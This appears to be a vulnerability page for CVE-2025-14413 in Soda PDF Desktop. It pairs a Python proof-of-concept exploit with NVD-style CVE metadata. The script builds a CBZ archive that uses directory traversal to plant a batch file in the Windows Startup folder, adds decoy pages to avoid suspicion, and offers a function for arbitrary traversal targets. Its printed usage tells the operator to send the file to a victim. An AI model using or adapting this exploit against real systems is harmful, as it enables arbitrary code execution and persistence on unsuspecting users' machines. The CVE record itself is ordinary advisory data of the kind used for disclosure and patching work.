CVE-2025-14413

#!/usr/bin/env python3 # CVE-2025-14413 PoC - Soda PDF Desktop CBZ Directory Traversal RCE # Author: Security Researcher # Note: This PoC is for educational and authorized testing purposes only import zipfile import os def create_malicious_cbz(): """ Create a malicious CBZ file with directory traversal payload Targets Windows startup folder for persistence """ # Path traversal sequence to escape sandbox and write to startup folder traversal_path = "../../../../../../ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/" malicious_filename = "evil.bat" # Payload: Creates a reverse shell connection or executes arbitrary command malicious_content = b"""@echo off REM Malicious payload for CVE-2025-14413 REM This demonstrates the directory traversal vulnerability start calc.exe """ # Alternative payload targeting different locations # Can also target: %APPDATA%, %TEMP%, application directories output_file = "CVE-2025-14413_poc.cbz" with zipfile.ZipFile(output_file, 'w') as cbz: # Create entry with directory traversal path # Soda PDF will write this file outside intended directory full_path = traversal_path + malicious_filename cbz.writestr(full_path, malicious_content) # Add benign content to avoid suspicion cbz.writestr("comic/page1.jpg", b"fake_image_data") cbz.writestr("comic/page2.jpg", b"fake_image_data") print(f"[+] Created malicious CBZ file: {output_file}") print(f"[+] Payload will attempt to write to startup folder") return output_file def create_exploit_cbz(target_path, payload_filename, payload_content): """ Generate exploit CBZ with custom traversal target Args: target_path: Directory traversal path (e.g., ../../AppData/...) payload_filename: Name of file to create on target system payload_content: Content to write to the file """ exploit_file = "exploit.cbz" with zipfile.ZipFile(exploit_file, 'w') as cbz: malicious_entry = target_path + payload_filename cbz.writestr(malicious_entry, payload_content) print(f"[+] Exploit CBZ created: {exploit_file}") return exploit_file if __name__ == "__main__": print("=" * 60) print("CVE-2025-14413 - Soda PDF Desktop CBZ Directory Traversal") print("=" * 60) create_malicious_cbz() print("\n[*] Usage: Send the generated .cbz file to victim") print("[*] When victim opens file in Soda PDF Desktop, payload executes")

{"cve": {"id": "CVE-2025-14413", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:48.140", "lastModified": "2026-01-07T21:15:30.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soda PDF Desktop CBZ File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of CBZ files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27509."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sodapdf:soda_pdf_desktop:14.0.509.23030:*:*:*:*:*:*:*", "matchCriteriaId": "1D8EE1AA-FC6C-4164-970C-E9DCE64DA560"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1086/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}